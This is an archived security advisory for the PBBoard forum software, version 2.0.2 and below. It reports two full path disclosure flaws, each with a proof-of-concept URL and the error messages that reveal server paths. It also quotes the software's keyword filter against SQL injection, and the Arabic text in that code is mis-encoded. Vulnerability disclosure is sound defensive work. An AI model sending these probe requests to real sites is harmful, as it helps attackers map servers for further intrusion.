AOH :: HP Unsorted P :: BT-21756.HTM

PBBoard <=2.0.2 Full Path Disclosure



PBBoard <=2.0.2 Full Path Disclosure
PBBoard <=2.0.2 Full Path Disclosure



Advisory]PBBoard <=2.0.2 - Full Path Disclosure
Details
======Product: PHP <= PBBoard
Security-Risk: moderated
Remote-Exploit: yes
Vendor-URL: http://www.pbboard.com 

Credits
===========Discovered by: rUnViRuS
site: http://www.sec-area.com 

Affected Products:
----------------------------
test on PBBoard 2.0.2
maybe work under 2.0.2 

More Details
===========1. Full Path Disclosure
-----------------------------------
allow attackers to gather the real path of the server side script.

Proof of concept:
http://www.[xxxxx].com/path/index.php?page=new_topic&index=1&id=union 

error
Fatal error: Call to undefined method PowerBBLocalCommon::error() in /home/xxx/public_html/vb/common.php on line 193

code :
// Check if $_GET don't value any SQL Injection
foreach ($PowerBB->_GET as $sql_get)
{
if ((eregi("select", $sql_get)) or
(eregi("union", $sql_get)) or
(eregi("%", $sql_get)))
{
$this->error('ظ=82ظ=85طھ ط=A8ط=B9ظ=85ظ=84ظٹظ=87 ط؛ظٹط=B1 ظ=85ط=B4ط=B1ظ=88ط=B9ظ=87!');
}
}
==============================2. Full Path Disclosure
-----------------------------------
allow attackers to gather the real path of the server side script.

Proof of concept:
http://www.[xxxx].com/[path]/index.php?page=search&start=1&keyword==A7ion=all&search=1 

Warning: filesize() [function.filesize]: stat failed for show_msg in /home/xxxxx/public_html/vb/includes/template.class.php on line 99

Fatal error: ERROR::FILE_SIZE_IS_ZERO in /home/xxxxx/public_html/vb/includes/template.class.php on line 146

--------------------------------------------------
[W]orld [D]efacers [T]eam
http://www.Sec-area.com 

--------------------------------------------------

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.